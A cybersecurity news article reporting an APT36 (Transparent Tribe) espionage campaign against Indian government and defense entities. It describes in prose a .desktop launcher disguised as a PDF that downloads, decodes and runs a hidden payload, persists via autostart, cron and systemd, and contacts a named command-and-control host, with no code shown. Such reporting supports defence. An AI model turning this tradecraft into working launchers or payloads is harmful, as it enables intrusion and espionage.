430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|Apple Fixes WebKit Flaws in iOS and macOS, With Help From AI Tools|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|Apple Fixes WebKit Flaws in iOS and macOS, With Help From AI Tools|
Advertisement

Ad Placeholder

Full Width × 90

APT

Pakistan-linked APT36 abuses Linux .desktop files to drop custom malware in new campaign

APT36 uses Linux .desktop files in new attacks on Indian gov & defense, aiming for data theft and persistent espionage access. Transparent Tribe (aka APT36, Operation C-Major, and Mythic Leopard), a Pakistan-linked threat actor, is using Linux .desktop files to load malware in new attacks against government and defense entities in India. The APT group […]

APT36

APT36 uses Linux .desktop files in new attacks on Indian gov & defense, aiming for data theft and persistent espionage access.

Transparent Tribe (aka APT36, Operation C-Major, and Mythic Leopard), a Pakistan-linked threat actor, is using Linux .desktop files to load malware in new attacks against government and defense entities in India.

The APT group is targeting Indian government entities via spear-phishing emails deploying custom malware for persistent espionage.

APT36’s latest campaign uses a malicious archive “Meeting_Notice_Ltr_ID1543ops.pdf_.zip” containing a disguised .desktop file flagged on VirusTotal.

The shortcut masquerades as a PDF but executes hidden commands via Bash. The “.desktop” file mimics a PDF but hides malicious commands in its Exec= line. It downloads a hex-encoded payload from securestore[.]cv, decodes and executes it silently, while showing a benign PDF in Firefox as a decoy. Disguised with a PDF icon, set to run as an application, and enabled for autostart, it ensures persistence and stealth, letting malware operate unnoticed.

The campaign was uncovered on August 1, 2025, and is still ongoing.

The analyzed file is a suspicious 64-bit ELF executable for x86-64, statically linked, with anomalies like a huge section header offset, missing section names, and irregular segments typical of malware packing. It embeds the hardcoded C2 “modgovindia[.]space:4000” and ensures persistence via cron jobs and systemd service abuse. On execution, it connects to the C2, using DNS queries and UDP sockets for stealthy communication, enabling data exfiltration and attacker control.

The Operation Transparent Tribe (Operation C-Major, APT36, and Mythic Leopard) was first spotted by Proofpoint Researchers in Feb 2016, in a series of cyber espionage operations against Indian diplomats and military personnel in some embassies in Saudi Arabia and Kazakhstan. At that time, the researchers tracked the sources IP in Pakistan, the attacks were part of a wider operation that relies on multi-vector such as watering hole websites and phishing email campaigns delivering custom RATs dubbed Crimson and Peppy. These RATs are capable of exfiltrate information, take screenshot, and record webcam streams.

Transparent Tribe has been active since at least 2013, it targeted entities across 27 countries, most of them in Afghanistan, Germany, India, Iran, and Pakistan.

Transparent Tribe (APT36) was first spotted in 2016 targeting Indian diplomats and military staff via phishing and watering hole attacks. Linked to Pakistan, it used custom RATs like Crimson and Peppy to exfiltrate data, capture screenshots, and record webcams. The group has targeted entities in 27 countries, mainly India, Afghanistan, Germany, Iran, and Pakistan.

“While Indian government entities remain the primary focus, APT36 has extended operations to adjacent sectors (education, research, and civil society), as well as opportunistic targeting in other geographies. This broad victimology increases the attack surface and introduces risk to partners, suppliers, and diplomatic missions abroad.” concludes the report published by CYFIRMA. “The adoption of .desktop payloads targeting Linux BOSS reflects a tactical shift toward exploiting indigenous technologies. Combined with traditional Windows-based malware and mobile implants, this shows the group’s intent to diversify access vectors and ensure persistence even in hardened environments.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, APT36)